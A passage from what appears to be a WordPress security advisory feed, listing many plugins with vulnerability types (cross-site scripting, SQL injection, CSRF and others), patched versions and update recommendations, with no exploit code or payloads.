Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Missing Authorization via init
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.27
Recommended Action: Update to version 3.3.27, or a newer patched version

Plugin: Localize My Post

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Unauthenticated SQL Injection
Patched Version: 6.2.9
Recommended Action: Update to version 6.2.9, or a newer patched version

Plugin: Slideshow Gallery

Plugin: TweetScribe

Plugin: Woocommerce Payment Gateway per Category

Plugin: Optin Forms – Simple List Building Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Wbcom Designs – BuddyPress Group Reviews

Vulnerability: Unauthorized AJAX Actions due to Nonce Bypass
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 7.3.10
Recommended Action: Update to version 7.3.10, or a newer patched version

Plugin: WP-ViperGB

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: FoxyPress

Plugin: CT Commerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Instagram for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting via ‘event_id’
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Unrestricted SVG Uploads
Patched Version: 3.0.14
Recommended Action: Update to version 3.0.14, or a newer patched version

Plugin: External Media

Vulnerability: Authenticated(Author+) File Upload to Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YouTube Playlist Player

Vulnerability: Cross-Site Request Forgery in ytpp_settings
Patched Version: 4.6.5
Recommended Action: Update to version 4.6.5, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: CSV Injection
Patched Version: 2.9.28
Recommended Action: Update to version 2.9.28, or a newer patched version

Plugin: Fast Flow

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Products Quick View for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Creative Contact Form

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Very Simple Quiz

Plugin: Event Expresso Free

Vulnerability: Authenticated SQL Injection
Patched Version: 3.1.37.12.L
Recommended Action: Update to version 3.1.37.12.L, or a newer patched version

Plugin: Generate PDF using Contact Form 7

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Information Disclosure
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy.

Vulnerability: Subscriber+ Arbitrary File/Folder Deletion
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.44
Recommended Action: Update to version 4.3.44, or a newer patched version

Plugin: MainWP File Uploader Extension

Vulnerability: Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Superb slideshow gallery

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 13.2
Recommended Action: Update to version 13.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 3.3.6
Recommended Action: Update to one of the following versions, or a newer patched version: 3.3.6, 3.4.8, 3.5.9, 3.6.6, 3.7.2, 3.8.2, 3.9.4, 4.0.2, 4.1.2, 4.2.3, 4.3.4, 4.4.2, 4.5.3, 4.6.3, 4.7.2, 4.8.1, 4.9.3, 5.0.1, 5.1.1, 5.2.3, 5.3.1, 5.4.2, 5.5.1, 5.5.2

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Multiple SQL Injections
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Continuous Image Carousel With Lightbox

Vulnerability: Reflected Cross-Site Scripting via search_term, order_by and order_pos
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: PDF Block

Plugin: Multicons [ Multiple Favicons ]

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: WP CleanFix

Vulnerability: Remote Code Execution
Patched Version: 5.0.0
Recommended Action: Update to version 5.0.0, or a newer patched version

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.19.2
Recommended Action: Update to version 2.19.2, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Sensitive Information Exposure
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Mobile-Friendly Image Gallery <= 1.8.19
Patched Version: 1.8.20
Recommended Action: Update to version 1.8.20, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Unauthenticated Stored Cross-Site Scripting via REST API
Patched Version: 9.0.28
Recommended Action: Update to version 9.0.28, or a newer patched version

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Directory Traversal
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: WP-Business Directory

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.9.1
Recommended Action: Update to version 1.6.9.1, or a newer patched version

Plugin: G-Lock Double Opt-in Manager

Plugin: Read more By Adam

Plugin: Flipbox – Awesomes Flip Boxes Image Overlay

Vulnerability: Authenticated (Admin+) Arbitrary Options Update
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Magee Shortcodes

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass to Information Disclosure
Patched Version: 3.7.11
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.11, 3.8.11, 3.9.9, 4.0.8, 4.1.8, 4.2.5, 4.3.1

Plugin: Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more!

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.9.4
Recommended Action: Update to version 1.4.9.4, or a newer patched version

Plugin: Export All URLs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Site Reviews

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.13.1
Recommended Action: Update to version 5.13.1, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Mediabay – Media Library Folders

Vulnerability: Missing Authorization via AJAC actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Amazon Affiliate Link Localizer

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Block Plugin Update

Vulnerability: Cross-Site Request Forgery via bspu_plugin_select.php
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.63
Recommended Action: Update to version 1.5.63, or a newer patched version

Plugin: Easy Updates Manager

Vulnerability: Insufficient Restrictions on Option Changes
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: Cookies by JM

Plugin: Custom Cart Link for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WHIZZ

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Members Import

Vulnerability: Self Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: New User Approve

Vulnerability: Cross-Site Request Forgery via admin_notices
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 2.6.85
Recommended Action: Update to version 2.6.85, or a newer patched version

Plugin: Elementor Forms Google Sheet Connector Pro

Vulnerability: Reflected Cross-Site Scripting via ‘code’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smoothscroller

Plugin: Booster Plus for WooCommerce

Vulnerability: Cross-Site Request Forgery to File Deletion
Patched Version: 5.6.5
Recommended Action: Update to version 5.6.5, or a newer patched version

Plugin: WP Page Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_edit_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Shortcode IMDB

Plugin: Gallery Plugin for WordPress – Envira Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.4.7
Recommended Action: Update to version 1.8.4.7, or a newer patched version

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Multiple Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Leyka

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.30
Recommended Action: Update to version 3.30, or a newer patched version

Plugin: Nextend Twitter Connect

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 10.4.3
Recommended Action: Update to version 10.4.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_multiple_files_for_post
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Subscriber+ Arbitrary File Upload
Patched Version: 4.24
Recommended Action: Update to version 4.24, or a newer patched version

Plugin: Testimonial Slider – Free Testimonials Slider Plugin

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.5.8.4
Recommended Action: Update to version 3.5.8.4, or a newer patched version

Plugin: WP-Table

Vulnerability: Remote File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: YITH WooCommerce Bulk Product Editing

Vulnerability: Authenticated Settings Change
Patched Version: 1.2.14
Recommended Action: Update to version 1.2.14, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Cross-Site Scripting
Patched Version: 4.29.9
Recommended Action: Update to version 4.29.9, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Plugin: WordPress RokBox

Plugin: Download Monitor

Vulnerability: Authenticated (Admin+) Arbitrary File Download
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: Speed Booster Pack ⚡ PageSpeed Optimization Suite

Vulnerability: Admin+ SQL Injection
Patched Version: 4.3.3.1
Recommended Action: Update to version 4.3.3.1, or a newer patched version

Plugin: User Login History

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Post List Designer by Category – List Category Post Or Recent Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: If Menu – Visibility control for Menus

Vulnerability: Missing Authorization to Admin Settings Modification
Patched Version: 0.17
Recommended Action: Update to version 0.17, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Missing Authorization via handleBeforeGateway
Patched Version: 2.33.2
Recommended Action: Update to version 2.33.2, or a newer patched version

Plugin: Kama Click Counter

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: WebP Express

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.14.11
Recommended Action: Update to version 0.14.11, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: 0mk Shortener

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Cross-Site Request Forgery to Custom Field Creation
Patched Version: 1.2.91
Recommended Action: Update to version 1.2.91, or a newer patched version

Plugin: Jquery news ticker

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Nelio AB Testing

Vulnerability: Server Side Request Forgery
Patched Version: 4.5.9
Recommended Action: Update to version 4.5.9, or a newer patched version

Plugin: WP Plugin Lister

Plugin: W3 Total Cache

Vulnerability: Cross-Site Scripting via request_id
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Share and Follow

Vulnerability: Cross-Site Scripting
Patched Version: 1.80.4
Recommended Action: Update to version 1.80.4, or a newer patched version

Plugin: screets-lcx

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: IMPress Listings

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: WP REST API (WP API)

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Google SEO Pressor for Rich snippets

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: PubyDoc – Data Tables and Charts

Plugin: Vospari Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘user-submitted-content’
Patched Version: 20230811
Recommended Action: Update to version 20230811, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via social_icon_1 parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Simple Page Ordering

Vulnerability: Regular Expression Denial of Service
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Simple Banner – Easily add multiple Banners/Bars/Notifications/Announcements to the top or bottom of your website

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: ARI Fancy Lightbox – Popup for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Photospace Responsive Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: FontMeister – The Font Management Plugin

Core: WordPress

Vulnerability: Cross-Site Request Forgery Protection Bypass
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Greeklish-permalink

Vulnerability: Missing Authorization via cyrtrans_ajax_old AJAX action
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Post to CSV by BestWebSoft

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 12.0.8
Recommended Action: Update to version 12.0.8, or a newer patched version

Plugin: CM WordPress Search And Replace Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WP-RecentComments

Vulnerability: Unauthenticated Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Erident Custom Login and Dashboard

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Lava Directory Manager

Vulnerability: Unauthenticated Stored Cross-Site Scripting via New Listing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion (wo_ajax_remove_client)
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Unauthenticated Blind SQL Injection via time Parameter
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Advanced Forms for ACF

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: iFeature Slider

Plugin: Mailrelay

Vulnerability: Cross-Site Request Forgery via render_admin_page
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Cookie Information | Free GDPR Consent Solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: WPS Child Theme Generator

Vulnerability: Directory Traversal
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: My Tickets – Accessible Event Ticketing

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.11
Recommended Action: Update to version 1.9.11, or a newer patched version

Plugin: WordPress支付宝Alipay|财付通Tenpay|贝宝PayPal集成插件

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.33.2
Recommended Action: Update to version 1.0.33.2, or a newer patched version

Plugin: WordPress Users

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.13.60
Recommended Action: Update to version 1.13.60, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Arbitrary File Read
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: Authenticated (Contributor+) Stored Stored Cross-Site Scripting
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: WP eCommerce

Vulnerability: SQL Injection
Patched Version: 3.11.4
Recommended Action: Update to version 3.11.4, or a newer patched version

Plugin: Registrations for the Events Calendar – Event Registration Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.5.25
Recommended Action: Update to version 3.5.25, or a newer patched version

Plugin: Post Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: RSS Feed Reader

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.14.12
Recommended Action: Update to version 1.14.12, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Missing Authorization to Non-Arbitrary File Upload
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: 1g-music-share

Plugin: Stock in & out

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.67
Recommended Action: Update to version 1.3.67, or a newer patched version

Plugin: Shop as a Customer for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Privilege Escalation
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Analyticator

Vulnerability: Cross-Site Scripting
Patched Version: 6.4.9.6
Recommended Action: Update to version 6.4.9.6, or a newer patched version

Plugin: Urvanov Syntax Highlighter

Vulnerability: Cross-Site Request Forgery via init_ajax
Patched Version: 2.8.34
Recommended Action: Update to version 2.8.34, or a newer patched version

Plugin: Donation Platform for WooCommerce: Fundraising & Donation Management

Vulnerability: Cross-Site Request Forgery to Survey Submission
Patched Version: 1.2.10
Recommended Action: Update to version 1.2.10, or a newer patched version

Plugin: WPGraphQL WooCommerce

Plugin: WP Hide Post

Vulnerability: Cross-Site Request Forgery via save_bulk_edit_data
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Database Reset

Vulnerability: Privilege Escalation
Patched Version: 3.15
Recommended Action: Update to version 3.15, or a newer patched version

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.8.5
Recommended Action: Update to version 1.9.8.5, or a newer patched version

Plugin: Role Scoper (Obsolete – Please install PublishPress Permissions)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.67
Recommended Action: Update to version 1.3.67, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.3.9
Recommended Action: Update to version 5.3.9, or a newer patched version

Plugin: WordPress Processing Embed

Plugin: Notices

Plugin: InBoundio Marketing

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: Missing Authorization
Patched Version: 2.16.5
Recommended Action: Update to version 2.16.5, or a newer patched version

Plugin: Participants Database

Vulnerability: Missing Authorization
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Throws SPAM Away

Vulnerability: Cross-Site Request Forgery to Comment Modification
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: WordPress Filter Gallery Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.1.6
Recommended Action: Update to version 0.1.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Directory Traversal
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Core: WordPress

Vulnerability: Missing Session Cookie Expiration
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Email Log

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Conditional Fields for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Cimy Header Image Rotator

Plugin: Bloom Email Opt-In

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: NMI Gateway For WooCommerce

Plugin: Simple Download Monitor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Meks Audio Player

Vulnerability: Cross-Site Request Forgery via meks_remove_notification
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: efence

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webmention

Vulnerability: Reflected Cross-Site Scripting via ‘replytocom’
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: WP Downgrade | Specific Core Version

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Contact Form 7 Captcha

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.0.9
Recommended Action: Update to version 0.0.9, or a newer patched version

Plugin: Bradesco Gateway

Plugin: IP Blacklist Cloud

Vulnerability: Authenticated (Admin+) Path Traversal
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: Easy Google Adsense and Banner Ads Manager – AdsforWP

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.15.14
Recommended Action: Update to version 1.15.14, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
